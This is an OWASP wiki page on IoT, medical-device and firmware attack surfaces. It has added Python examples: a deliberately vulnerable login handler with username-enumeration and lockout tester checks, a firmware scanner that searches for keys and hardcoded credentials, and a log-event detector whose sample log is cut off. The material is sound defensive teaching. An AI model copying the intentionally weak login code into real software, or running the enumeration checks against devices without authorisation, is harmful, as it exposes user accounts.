{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or relies on deprecated, unmaintained protocol versions, e.g. SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that makes that service, or the entire device, unavailable<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a great deal of useful information: the binaries (and sometimes source code) of running services, preset passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, an attacker can halt the CPU, alter registers and memory, and redirect the firmware's execution (e.g. skip an authentication check), bypassing almost all software-based security controls<br />
* Fault-injection (glitching) and side-channel attacks can likewise alter the execution flow or leak sensitive information, such as key material, from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain a full console (bootloader prompt or root shell) on the device<br />
* Common countermeasures are custom bootloaders that block entry into single-user mode, but these can frequently be bypassed as well<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH daemons, web servers, etc.<br />
|-<br />
<br />
|}<br />
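The Username Enumeration, Weak Passwords and Account Lockout rows above recur on every interface in the attack surface table (device web, administrative, cloud and mobile). The Python block below is an added example, not code from the OWASP project or from any device: a deliberately weak device login handler next to a hardened one, and the two checks a tester runs against either. The accounts, passwords, lockout threshold and password blocklist are constructed values chosen for the demonstration.<br />
<br />
```python
"""Username enumeration, weak passwords and missing lockout on a device login.

Added example, not OWASP project code. VulnerableLogin shows the three
weaknesses from the table; HardenedLogin closes them. The account store,
passwords, threshold and blocklist are constructed for the demonstration.
"""
import hashlib
import hmac
import os

MAX_FAILURES = 5                                    # assumption: lock after 5 consecutive failures
MIN_PASSWORD_LENGTH = 12                            # assumption: policy minimum
COMMON_PASSWORDS = {"1234", "123456", "password", "admin", "root"}   # constructed blocklist
KDF_ITERATIONS = 50_000                             # kept low for the demo; raise on a real device


def _derive(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; raw passwords are never stored or compared."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS)


def make_store(accounts: dict) -> dict:
    """Constructed account store: username -> (salt, derived key)."""
    store = {}
    for user, password in accounts.items():
        salt = os.urandom(16)
        store[user] = (salt, _derive(password, salt))
    return store


STORE = make_store({"admin": "admin", "alice": "correct-horse-battery-staple"})


class VulnerableLogin:
    """Distinct error messages, no failure counter, no password policy."""

    def __init__(self, store: dict):
        self.store = store

    def login(self, user: str, password: str):
        if user not in self.store:
            return False, "unknown user"           # tells the attacker the name is wrong...
        salt, key = self.store[user]
        if _derive(password, salt) == key:         # plain == is also not constant-time
            return True, "ok"
        return False, "wrong password"             # ...and this one that the name is right

    def set_password(self, user: str, new_password: str) -> bool:
        salt = os.urandom(16)                      # accepts '1234' without complaint
        self.store[user] = (salt, _derive(new_password, salt))
        return True


class HardenedLogin:
    """One failure message, per-account lockout, constant-time compare, policy."""

    _DUMMY = (os.urandom(16), b"\x00" * 32)       # used for unknown users so timing matches

    def __init__(self, store: dict):
        self.store = store
        self.failures = {}                         # user -> consecutive failed attempts

    def login(self, user: str, password: str):
        if self.failures.get(user, 0) >= MAX_FAILURES:
            return False, "login failed"           # locked, but indistinguishable from a bad password
        salt, key = self.store.get(user, self._DUMMY)
        candidate = _derive(password, salt)        # always run the KDF, even for unknown users
        if user in self.store and hmac.compare_digest(candidate, key):
            self.failures.pop(user, None)
            return True, "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        return False, "login failed"

    def set_password(self, user: str, new_password: str) -> bool:
        if len(new_password) < MIN_PASSWORD_LENGTH or new_password.lower() in COMMON_PASSWORDS:
            return False
        salt = os.urandom(16)
        self.store[user] = (salt, _derive(new_password, salt))
        return True


def enumeration_oracle(handler) -> bool:
    """Tester's check: do failure responses differ for unknown vs. known usernames?"""
    _, unknown = handler.login("no-such-user", "x")
    _, known = handler.login("admin", "definitely-not-the-password")
    return unknown != known


def lockout_works(handler, user: str = "alice") -> bool:
    """Tester's check: after MAX_FAILURES bad passwords, is the correct one still refused?"""
    for _ in range(MAX_FAILURES):
        handler.login(user, "wrong")
    ok, _ = handler.login(user, "correct-horse-battery-staple")
    return not ok


if __name__ == "__main__":
    for cls in (VulnerableLogin, HardenedLogin):
        handler = cls(dict(STORE))
        print(cls.__name__, "enumerable:", enumeration_oracle(handler),
              "lockout:", lockout_works(handler),
              "accepts '1234':", handler.set_password("admin", "1234"))
```
<br />
The same two tester functions apply to a real target by replacing the handler with a small client for the device's login endpoint; response bodies, status codes and timing should all be compared, since any of them can serve as the enumeration oracle.<br />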
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Blocking of device firmware OTA updates (keeps the device on a vulnerable version)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! Details<br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
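The "Device Firmware Vulnerabilities" and "Guidance and Instruction" rows above list what a file-system analysis of an extracted image looks for. The Python block below is an added example, not code from the OWASP project or from Firmwalker, Binwalk or the other tools listed: a standard-library sweep over an extracted root file system for private keys, usable password hashes in /etc/shadow, hardcoded credentials and URLs, plus a cross-image comparison that flags a certificate shipped on more than one device. The two sample root file systems are constructed in a temporary directory, their PEM blocks are placeholders rather than real keys or certificates, and the regexes and size cut-off are assumptions.<br />
<br />
```python
"""Static triage of an extracted firmware root file system.
Added example (not OWASP project or Firmwalker code). Sample images are built in a
temp directory; PEM bodies are placeholders. Regexes and the size cut-off are assumptions.
"""
import hashlib
import os
import re
import tempfile

PEM_KEY = re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
PEM_CERT = re.compile(r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)
CREDENTIAL = re.compile(r"(?im)^[ \t]*\w*(?:passw(?:or)?d|secret|token|api_?key)\w*[ \t]*[=:][ \t]*\S+")
URL = re.compile(r"https?://[^\s\"'<>]+")
LOCKED = {"*", "!", "!!", "*LK*"}          # shadow password fields meaning 'account locked'
MAX_SIZE = 1 << 20                         # skip blobs over 1 MiB (kernels, squashfs remnants)

def scan_rootfs(root: str) -> list:
    """Return (category, path relative to root, detail) findings for one image."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > MAX_SIZE:
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                text = fh.read().decode("utf-8", errors="ignore")
            if PEM_KEY.search(text):
                findings.append(("private-key", rel, "PEM private key shipped in image"))
            for body in PEM_CERT.findall(text):
                # Fingerprint the base64 body so identical certificates match across images.
                findings.append(("certificate", rel, hashlib.sha256(body.encode()).hexdigest()[:16]))
            if rel == "etc/shadow":
                for line in text.splitlines():
                    fields = line.split(":")
                    if len(fields) > 1 and fields[1] not in LOCKED:
                        # empty field: login without a password; anything else: offline-crackable
                        cat = "empty-password" if fields[1] == "" else "shadow-hash"
                        findings.append((cat, rel, fields[0]))
            else:
                for m in CREDENTIAL.finditer(text):
                    findings.append(("hardcoded-credential", rel, m.group(0).strip()))
            for url in sorted(set(URL.findall(text))):
                findings.append(("url", rel, url))
    return findings

def shared_certificates(images: dict) -> dict:
    """Fingerprint -> sorted image names, for certificates present in more than one image."""
    seen = {}
    for name, root in images.items():
        for category, _, fingerprint in scan_rootfs(root):
            if category == "certificate":
                seen.setdefault(fingerprint, set()).add(name)
    return {fp: sorted(names) for fp, names in seen.items() if len(names) > 1}

def build_sample_images(base: str) -> dict:
    """Write two constructed root file systems under base; return {image: root}."""
    cert = ("-----BEGIN CERTIFICATE-----\n"
            "MIIBconstructedPlaceholderBodyNotARealCertificate==\n"
            "-----END CERTIFICATE-----\n")
    key = ("-----BEGIN RSA PRIVATE KEY-----\n"
           "MIIEconstructedPlaceholderBodyNotARealKey==\n"
           "-----END RSA PRIVATE KEY-----\n")
    trees = {
        "device_a": {
            "etc/shadow": "root:$1$c0nstr$uctedHashValue:17000:0:99999:7:::\n"
                          "daemon:*:17000:0:99999:7:::\n",
            "etc/ssl/device.pem": cert + key,            # key and cert baked into every unit
            "etc/app.conf": "cloud_url = https://api.example.com/v1/report\n"
                            "admin_password = admin1234\n",
        },
        "device_b": {
            "etc/shadow": "root:!:17000:0:99999:7:::\n",
            "etc/ssl/device.pem": cert,                  # same certificate on a second product
            "etc/app.conf": "cloud_url = https://api.example.com/v1/report\n",
        },
    }
    roots = {}
    for image, tree in trees.items():
        root = os.path.join(base, image)
        for rel, content in tree.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
        roots[image] = root
    return roots

def run_demo() -> tuple:
    """Build the samples, scan each, and return ({image: findings}, shared certificates)."""
    with tempfile.TemporaryDirectory() as tmp:
        images = build_sample_images(tmp)
        findings = {name: scan_rootfs(root) for name, root in images.items()}
        return findings, shared_certificates(images)

if __name__ == "__main__":
    per_image, shared = run_demo()
    for image, items in per_image.items():
        for item in items:
            print(image, *item)
    print("certificates shared across images:", shared)
```
<br />
Point scan_rootfs at the directory Binwalk or the Firmware Modification Kit extracted, and pass several extracted images to shared_certificates to check the "same certificate used on multiple devices" item; the certificate expiry check from the same list needs an X.509 parser and is deliberately left out of this standard-library example.<br />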
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of events an IoT device should log. It applies to many device types, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
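The table above names events but not how a device or collector would derive them from raw records. The Python block below is an added example, not code from the OWASP project or from AppSensor: it reads constructed device log lines (one JSON record per line) and emits events from the Authentication, Session, Ecosystem Membership, Administrative Mode and Request Exception categories. The record format, field names, thresholds, the enrolled and disenrolled device rosters and the sample log itself are all assumptions made for the demonstration; in particular the record carries a flag the device set when a factory-default credential was used, rather than the password itself.<br />
<br />
```python
"""Deriving IoT logging events from raw device records.

Added example (not OWASP or AppSensor code). Record layout, field names,
thresholds, the device rosters and the sample log are constructed
assumptions for the demonstration.
"""
import json
from collections import defaultdict, deque

FAILED_PASSWORD_THRESHOLD = 3     # consecutive failures for one user
RATE_WINDOW_SECONDS = 60          # sliding window for login-rate detection
RATE_THRESHOLD = 10               # attempts from one source within the window
ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
ENROLLED = {"dev-0001", "dev-0002"}     # constructed ecosystem roster
DISENROLLED = {"dev-0009"}              # constructed: decommissioned but still talking


def detect(lines):
    """Yield (ts, event name, detail) for every record that trips a rule."""
    failures = defaultdict(int)           # user -> consecutive failed logins
    attempts = defaultdict(deque)         # source -> timestamps of login attempts
    sessions = {}                         # session id -> source address first seen
    for line in lines:
        if not line.strip():
            continue
        rec = json.loads(line)
        ts, kind = rec["ts"], rec["event"]
        if kind == "login":
            src, user = rec["src"], rec["user"]
            window = attempts[src]
            window.append(ts)
            while ts - window[0] > RATE_WINDOW_SECONDS:
                window.popleft()
            if len(window) == RATE_THRESHOLD:        # fires once, when the window first fills
                yield ts, "High Rate of Login Attempts", f"{src}: {RATE_THRESHOLD} in {RATE_WINDOW_SECONDS}s"
            if rec["result"] == "fail":
                failures[user] += 1
                if failures[user] == FAILED_PASSWORD_THRESHOLD:
                    yield ts, "Multiple Failed Passwords", user
            else:
                failures[user] = 0
                if rec.get("default_credential"):    # flag set by the device; the password is never logged
                    yield ts, "Device Accessed Using Default Administrative Credentials", f"{user} from {src}"
        elif kind == "mode" and rec["mode"] == "admin":
            yield ts, "Device Entered Administrative Mode", rec["src"]
        elif kind == "request":
            sid, src = rec["session"], rec["src"]
            origin = sessions.setdefault(sid, src)
            if origin != src:
                yield ts, "Source Location Changes During Session", f"{sid}: {origin} -> {src}"
            if rec["method"] not in ALLOWED_METHODS:
                yield ts, "Attempt to Invoke Unsupported HTTP Method", f"{rec['method']} {rec['path']}"
        elif kind == "peer":
            dev = rec["device_id"]
            if dev in DISENROLLED:
                yield ts, "Traffic Seen from Disenrolled System", dev
            elif dev not in ENROLLED:
                yield ts, "Traffic Seen from Unenrolled System", dev


# Constructed sample log: a default-credential admin login after three failures,
# a session that hops source address and uses TRACE, two rogue peers, and a
# ten-attempt burst from one address.
SAMPLE_LOG = """\
{"ts": 1000, "event": "login", "src": "10.0.0.5", "user": "admin", "result": "fail"}
{"ts": 1001, "event": "login", "src": "10.0.0.5", "user": "admin", "result": "fail"}
{"ts": 1002, "event": "login", "src": "10.0.0.5", "user": "admin", "result": "fail"}
{"ts": 1003, "event": "login", "src": "10.0.0.5", "user": "admin", "result": "ok", "default_credential": true}
{"ts": 1004, "event": "mode", "mode": "admin", "src": "10.0.0.5"}
{"ts": 1005, "event": "request", "session": "s1", "src": "10.0.0.5", "method": "GET", "path": "/status"}
{"ts": 1006, "event": "request", "session": "s1", "src": "198.51.100.7", "method": "TRACE", "path": "/status"}
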